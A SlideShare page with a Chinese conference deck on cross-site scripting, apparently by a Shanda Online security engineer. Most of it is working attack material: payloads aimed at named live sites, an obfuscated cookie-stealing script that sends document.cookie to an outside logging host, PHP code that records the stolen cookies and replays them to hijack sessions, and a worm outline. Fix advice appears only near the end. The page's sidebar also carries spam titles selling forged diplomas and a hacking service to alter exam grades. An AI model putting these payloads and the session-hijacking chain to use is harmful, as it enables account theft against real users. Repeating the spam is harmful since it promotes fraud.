Suche senden
Hochladen
Share xss
•
Als PPT, PDF herunterladen
•
1 gefällt mir
•
926 views
P
paitoubing
Folgen
Bildung
Melden
Teilen
Melden
Teilen
1 von 24
Jetzt herunterladen
Empfohlen
Web2.0 attack and defence
Web2.0 attack and defence
hackstuff
滲透測試基本技巧與經驗分享
滲透測試基本技巧與經驗分享
WEI CHIEH CHAO
Web安全解决方案V1.0
Web安全解决方案V1.0
xuanliang
2011網路犯罪大解密
2011網路犯罪大解密
NTUSTBIC
ASP.NET MVC 開發分享
ASP.NET MVC 開發分享
Eric Ping
什麼是PHP & JavaScript
什麼是PHP & JavaScript
Eric Ping
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
Orange Tsai
Rain catchers
Rain catchers
Hitesh Majithiya
Empfohlen
Web2.0 attack and defence
Web2.0 attack and defence
hackstuff
滲透測試基本技巧與經驗分享
滲透測試基本技巧與經驗分享
WEI CHIEH CHAO
Web安全解决方案V1.0
Web安全解决方案V1.0
xuanliang
2011網路犯罪大解密
2011網路犯罪大解密
NTUSTBIC
ASP.NET MVC 開發分享
ASP.NET MVC 開發分享
Eric Ping
什麼是PHP & JavaScript
什麼是PHP & JavaScript
Eric Ping
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
Orange Tsai
Rain catchers
Rain catchers
Hitesh Majithiya
Telligem 1_xss
Telligem 1_xss
paitoubing
前端MVVM框架安全
前端MVVM框架安全
Borg Han
用戶端攻擊與防禦
用戶端攻擊與防禦
Taien Wang
第四节课:web安全2.0
第四节课:web安全2.0
Tommy Chang
軟體弱點掃描
軟體弱點掃描
Rainmaker Ho
Web security
Web security
逸于 張
浅谈前端安全与规范(渔隐)
浅谈前端安全与规范(渔隐)
tbmallf2e
从无阻塞并行脚本加载(Lab.js)到浏览器消息模型
从无阻塞并行脚本加载(Lab.js)到浏览器消息模型
Jackson Tian
Exam 98-375 HTML5 Application Development Fundamentals
Exam 98-375 HTML5 Application Development Fundamentals
Chieh Lin
TBAD F2E 2010 review
TBAD F2E 2010 review
leneli
Node Web开发实战
Node Web开发实战
fengmk2
Responsive Web UI Design
Responsive Web UI Design
jay li
新技术新挑战
新技术新挑战
xiang.zhaox
恶意网页分析实战
恶意网页分析实战
Huang Toby
移动端Web开发性能优化实践
移动端Web开发性能优化实践
Mingel Zhang
前端杂谈
前端杂谈
salinet
電腦網路 網路安全
電腦網路 網路安全
bruce761207
網路安全
網路安全
bruce761207
網路安全
網路安全
bruce761207
Internet Security
Internet Security
bruce761207
EDUC6506(001)_ClassPresentation_2_TC330277 (1).pptx
EDUC6506(001)_ClassPresentation_2_TC330277 (1).pptx
mekosin001123
EDUC6506_ClassPresentation_TC330277 (1).pptx
EDUC6506_ClassPresentation_TC330277 (1).pptx
mekosin001123
Weitere ähnliche Inhalte
Ähnlich wie Share xss
Telligem 1_xss
Telligem 1_xss
paitoubing
前端MVVM框架安全
前端MVVM框架安全
Borg Han
用戶端攻擊與防禦
用戶端攻擊與防禦
Taien Wang
第四节课:web安全2.0
第四节课:web安全2.0
Tommy Chang
軟體弱點掃描
軟體弱點掃描
Rainmaker Ho
Web security
Web security
逸于 張
浅谈前端安全与规范(渔隐)
浅谈前端安全与规范(渔隐)
tbmallf2e
从无阻塞并行脚本加载(Lab.js)到浏览器消息模型
从无阻塞并行脚本加载(Lab.js)到浏览器消息模型
Jackson Tian
Exam 98-375 HTML5 Application Development Fundamentals
Exam 98-375 HTML5 Application Development Fundamentals
Chieh Lin
TBAD F2E 2010 review
TBAD F2E 2010 review
leneli
Node Web开发实战
Node Web开发实战
fengmk2
Responsive Web UI Design
Responsive Web UI Design
jay li
新技术新挑战
新技术新挑战
xiang.zhaox
恶意网页分析实战
恶意网页分析实战
Huang Toby
移动端Web开发性能优化实践
移动端Web开发性能优化实践
Mingel Zhang
前端杂谈
前端杂谈
salinet
電腦網路 網路安全
電腦網路 網路安全
bruce761207
網路安全
網路安全
bruce761207
網路安全
網路安全
bruce761207
Internet Security
Internet Security
bruce761207
Ähnlich wie Share xss
(20)
Telligem 1_xss
Telligem 1_xss
前端MVVM框架安全
前端MVVM框架安全
用戶端攻擊與防禦
用戶端攻擊與防禦
第四节课:web安全2.0
第四节课:web安全2.0
軟體弱點掃描
軟體弱點掃描
Web security
Web security
浅谈前端安全与规范(渔隐)
浅谈前端安全与规范(渔隐)
从无阻塞并行脚本加载(Lab.js)到浏览器消息模型
从无阻塞并行脚本加载(Lab.js)到浏览器消息模型
Exam 98-375 HTML5 Application Development Fundamentals
Exam 98-375 HTML5 Application Development Fundamentals
TBAD F2E 2010 review
TBAD F2E 2010 review
Node Web开发实战
Node Web开发实战
Responsive Web UI Design
Responsive Web UI Design
新技术新挑战
新技术新挑战
恶意网页分析实战
恶意网页分析实战
移动端Web开发性能优化实践
移动端Web开发性能优化实践
前端杂谈
前端杂谈
電腦網路 網路安全
電腦網路 網路安全
網路安全
網路安全
網路安全
網路安全
Internet Security
Internet Security
Kürzlich hochgeladen
EDUC6506(001)_ClassPresentation_2_TC330277 (1).pptx
EDUC6506(001)_ClassPresentation_2_TC330277 (1).pptx
mekosin001123
EDUC6506_ClassPresentation_TC330277 (1).pptx
EDUC6506_ClassPresentation_TC330277 (1).pptx
mekosin001123
哪里可以购买日本筑波学院大学学位记/做个假的文凭可认证吗/仿制日本大学毕业证/意大利语CELI证书定制
哪里可以购买日本筑波学院大学学位记/做个假的文凭可认证吗/仿制日本大学毕业证/意大利语CELI证书定制
jakepaige317
1.🎉“入侵大学入学考试中心修改成绩”来袭!ALEVEL替考大揭秘,轻松搞定考试成绩! 💥你还在为无法进入大学招生系统而烦恼吗?想知道如何通过技术手段更改...
1.🎉“入侵大学入学考试中心修改成绩”来袭!ALEVEL替考大揭秘,轻松搞定考试成绩! 💥你还在为无法进入大学招生系统而烦恼吗?想知道如何通过技术手段更改...
黑客 接单【TG/微信qoqoqdqd】
educ6506presentationtc3302771-240427173057-06a46de5.pptx
educ6506presentationtc3302771-240427173057-06a46de5.pptx
mekosin001123
泽兰应用科学大学毕业证制作/定制国外大学录取通知书/购买一个假的建国科技大学硕士学位证书
泽兰应用科学大学毕业证制作/定制国外大学录取通知书/购买一个假的建国科技大学硕士学位证书
jakepaige317
Kürzlich hochgeladen
(6)
EDUC6506(001)_ClassPresentation_2_TC330277 (1).pptx
EDUC6506(001)_ClassPresentation_2_TC330277 (1).pptx
EDUC6506_ClassPresentation_TC330277 (1).pptx
EDUC6506_ClassPresentation_TC330277 (1).pptx
哪里可以购买日本筑波学院大学学位记/做个假的文凭可认证吗/仿制日本大学毕业证/意大利语CELI证书定制
哪里可以购买日本筑波学院大学学位记/做个假的文凭可认证吗/仿制日本大学毕业证/意大利语CELI证书定制
1.🎉“入侵大学入学考试中心修改成绩”来袭!ALEVEL替考大揭秘,轻松搞定考试成绩! 💥你还在为无法进入大学招生系统而烦恼吗?想知道如何通过技术手段更改...
1.🎉“入侵大学入学考试中心修改成绩”来袭!ALEVEL替考大揭秘,轻松搞定考试成绩! 💥你还在为无法进入大学招生系统而烦恼吗?想知道如何通过技术手段更改...
educ6506presentationtc3302771-240427173057-06a46de5.pptx
educ6506presentationtc3302771-240427173057-06a46de5.pptx
泽兰应用科学大学毕业证制作/定制国外大学录取通知书/购买一个假的建国科技大学硕士学位证书
泽兰应用科学大学毕业证制作/定制国外大学录取通知书/购买一个假的建国科技大学硕士学位证书
Share xss
1.
跨站脚本漏洞分享 盛大在线:徐江涛 博客:
http://www.paitoubing.cn
2.
3.
Cross site scripting
简称 XSS 原理: 利用网站的漏洞向网站的页面注入 JAVASCRIPT 等脚本内容。 根源:程序的输入、输出没有考虑安全因素。 跨站脚本漏洞原理及其危害
4.
XSS Cheat Sheet
http://ha.ckers.org/xss.html 了解不同浏览器和各种特殊的 HTML 标签如何执行脚本。 XSS 需要使用的关键字 '';!--"<XSS>=&{()} 各类伪协议头: Javascript: vbscript: 跨站脚本漏洞原理及其危害
5.
CSS 样式表脚本注入
style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46, 120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,125))) expression 变形。 Expression 实际内容 if(window.x!="1"){alert("xss");window.x="1";} 跨站脚本漏洞原理及其危害
6.
挂马 插入恶意的脚本内容,运行病毒、木马。 钓鱼
篡改网页内容,骗取账号、密码等诈骗行为。 劫持会话 读取会话 COOKIE, 传送给第三方劫持身份。 XSS Worm 使用 AJAX 技术,做几何趋势的增长传播。 跨站脚本漏洞原理及其危害
7.
非持久型 XSS 需要从
URL 传参,点击链接触发。 持久型 XSS XSS 内容已存储到数据库,写到固定页面。 DOM XSS JAVASCRIPT 处理数据输出出现漏洞。 浏览器的漏洞造成的 XSS 跨站脚本漏洞原理及其危害
8.
表单值容易出现 XSS 搜索框、信息提示、个人资料、友情链接、背景图片等等。
各类表单值、隐藏的表单值都很危险。 跨站脚本漏洞及案例 案例 www.speak2me.com www.wealink.com www.gourmet114.com bambook.sdo.com
9.
跨站脚本漏洞及案例 <option value="5"
> 初级 </option><option value="2" > 中级 </option><option value="3" > 高级 </option> </select> <input name="key" class="f-text" type="text" style="margin-right:15px" value=""><body onload=alert(document.cookie)><""/> <input type="submit" class="f-button" value=" 搜索课程 " /> 搜索结果代码 http://www.speak2me.cn/index.php/Lessons/index/key/%22%3E%3Cbody%20onload%3Dalert(document.cookie)%3E%3C%22/x/39/y/10/ 非持久 XSS 过滤了反斜杠 /
10.
跨站脚本漏洞及案例 http://www.speak2me.cn/index.php/share/1804746 HTML
代码 : <div class="share-content"><p> <a href="http://"><body onload=eval(String.fromCharCode(118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34))><a a="" target="_blank">http://"> 持久 XSS
11.
跨站脚本漏洞及案例 劫持会话 攻击代码
var img = new Image();img.src="http://xss.paitoubing.cn/log.php?c='"+document.cookie+"'" 118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34 unicode 转换成 10 进制编码
12.
跨站脚本漏洞及案例 http://group.wealink.com/groups/feed 前端验证了非法字符
这样就安全了吗?
13.
跨站脚本漏洞及案例 通过 GET
方法跳过前端 http://group.wealink.com/groups/search?keyword=%22%3E%3Cbody%20onload=alert(1)%3E%3C%22
14.
跨站脚本漏洞及案例 http://www.gourmet114.com/search?key=%3Esss%3C%3E 通过
PHP 函数 strip_tags 去掉字符串中包含的任何 HTML 及 PHP 的标记字符串 无懈可击?
15.
跨站脚本漏洞及案例 照样篡改网页 http://www.gourmet114.com/search?key=%22%3E
真悲剧 未过滤、粗心大意安全隐患
16.
跨站脚本漏洞及案例 这个图、很熟悉吧 其实这是一个通知、不是过滤
17.
看图不说话、你懂的
18.
高级案例 劫持会话 记录会话
模拟登录 发送 xss 给好友 删除个人信息 跨站蠕虫流程图
19.
高级案例 记录会话 PHP
实例代码 <?php if( isset($_REQUEST['c']) ){ file_put_contents('./hi.log', $_SERVER['REQUEST_TIME']."".$_SERVER['QUERY_STRING']."", FILE_APPEND); } echo '200 ok'; 模拟登陆 PHP 实例代码 function _fetchUrl($url,$cookie) { global $ch; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_REFERER,""); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_COOKIE,$cookie); curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'read_header'); $html = curl_exec($ch); curl_close($ch); return $html; }
20.
高级案例 ZEND
调试环境下模拟登陆成功
21.
使用 htmlspecialchars 打开引号参数
htmlspecialchars ( $xss, ENT_QUOTES ) & ==> & " ==> " ' ==> ' // 需要打开引号参数 < ==> < > ==> > 跨站脚本漏洞修补建议
22.
使用 qsafehtml 安全类
UBB 安全类 富文本安全类 跨站脚本漏洞修补建议
23.
跨站脚本漏洞和 Web 应用紧密相关,同时又涉及到客户端浏览器的安全特性。
Web 安全已经不是单一的程序输出输出问题,必须从服务端、客户端、应用多方面考虑。 跨站脚本漏洞修补建议
24.
Thank you
Jetzt herunterladen